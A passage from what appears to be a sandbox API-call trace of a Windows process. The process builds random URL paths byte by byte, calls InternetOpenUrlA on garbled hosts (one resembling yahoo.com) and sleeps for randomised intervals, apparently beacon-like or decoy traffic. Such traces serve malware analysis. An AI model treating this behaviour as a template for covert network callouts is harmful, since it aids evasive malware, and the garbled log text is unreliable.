pbBuffer=0x46ffd5d) returned 0x0 [0187.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0187.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0187.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.122] GetProcessHeap () returned 0x440000 [0187.122] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473da0 [0187.122] lstrcpyA (in: lpString1=0x473da0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0187.122] lstrcatA (in: lpString1="\x04", lpString2="/7F9pr1eRnbxke5gosgkCmfd822y42/4D83lREiyc0Fzmjhjo5rqylDwu1Ohqfic4J0r9ke2/BncdWhtnnnhytcusee3Fozzhvo08gSBb8e/jgrD8Aac1fe12oblKhf13wog0HnwSn4jwu/" | out: lpString1="\x04/7F9pr1eRnbxke5gosgkCmfd822y42/4D83lREiyc0Fzmjhjo5rqylDwu1Ohqfic4J0r9ke2/BncdWhtnnnhytcusee3Fozzhvo08gSBb8e/jgrD8Aac1fe12oblKhf13wog0HnwSn4jwu/") returned="\x04/7F9pr1eRnbxke5gosgkCmfd822y42/4D83lREiyc0Fzmjhjo5rqylDwu1Ohqfic4J0r9ke2/BncdWhtnnnhytcusee3Fozzhvo08gSBb8e/jgrD8Aac1fe12oblKhf13wog0HnwSn4jwu/" [0187.122] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0187.122] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/7F9pr1eRnbxke5gosgkCmfd822y42/4D83lREiyc0Fzmjhjo5rqylDwu1Ohqfic4J0r9ke2/BncdWhtnnnhytcusee3Fozzhvo08gSBb8e/jgrD8Aac1fe12oblKhf13wog0HnwSn4jwu/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0187.122] GetProcessHeap () returned 0x440000 [0187.122] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473da0 | out: hHeap=0x440000) returned 1 [0187.123] GetProcessHeap () returned 0x440000 [0187.123] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4c40 | out: hHeap=0x440000) returned 1 [0187.123] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0187.123] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0187.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0187.123] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0187.123] Sleep (dwMilliseconds=0x14d74) [0187.383] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0187.384] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0187.384] GetProcessHeap () returned 0x440000 [0187.384] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f58b0 [0187.384] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0187.385] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f58b1, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x4f58b1) returned 0x0 [0187.385] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.386] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.387] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.387] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.387] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.388] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.388] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0187.388] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0187.389] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.389] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0187.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.716] GetProcessHeap () returned 0x440000 [0187.716] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0187.716] lstrcpyA (in: lpString1=0x4726f0, lpString2="¿GiÏs://www.yahoo.com" | out: lpString1="¿GiÏs://www.yahoo.com") returned="¿GiÏs://www.yahoo.com" [0187.716] lstrcatA (in: lpString1="¿GiÏs://www.yahoo.com", lpString2="/h1vwni8luMB2pMqkcswc39bxmoj/" | out: lpString1="¿GiÏs://www.yahoo.com/h1vwni8luMB2pMqkcswc39bxmoj/") returned="¿GiÏs://www.yahoo.com/h1vwni8luMB2pMqkcswc39bxmoj/" [0187.717] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0187.717] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="¿GiÏs://www.yahoo.com/h1vwni8luMB2pMqkcswc39bxmoj/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0187.717] GetProcessHeap () returned 0x440000 [0187.717] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0187.717] GetProcessHeap () returned 0x440000 [0187.717] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f58b0 | out: hHeap=0x440000) returned 1 [0187.718] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0187.718] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0187.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0187.719] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0187.719] Sleep (dwMilliseconds=0x1ceba) [0187.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0187.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0187.962] GetProcessHeap () returned 0x440000 [0187.962] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b2c0 [0187.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0187.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b2c1, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a1b2c1) returned 0x0 [0187.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0187.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0187.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b2d5, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x3a1b2d5) returned 0x0 [0187.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, 